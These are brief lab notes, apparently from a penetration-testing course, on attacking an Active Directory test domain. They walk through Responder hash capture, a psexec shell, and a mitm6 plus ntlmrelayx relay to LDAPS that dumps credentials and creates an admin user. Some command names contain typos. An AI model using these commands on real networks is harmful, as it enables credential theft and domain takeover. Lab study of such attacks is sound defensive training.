The following method requires user interaction (like from RDP session)
- 1.Run a responder.py to listen to activities.
- 2.obtain hashes and crack them
- 3.gain a shell via psexec.py
- 1.Download mitm6 and pip3 . it
- 2.Set up Ldaps on Windows server
- server -> manage -> add roles and features -> add active directory certificates -> configure ADCS (restart option enabled) -> click CA -> restart the machine
3. python3 mimt6.py -d marvel.local (in opt folder) -> this starts listening for connections
4. ntlmrelayx.py -6 -t ldaps://DOMAINCONTROLLER_IP -wh fakewpad.marvel.local -l lootme
5. User restarts a computer -> all the creds will be stored in a folder called "lootme"
If you look at it on firefox, you can see all kinds of secrets!
Once user logins as admin, it creates a new user with admin priv .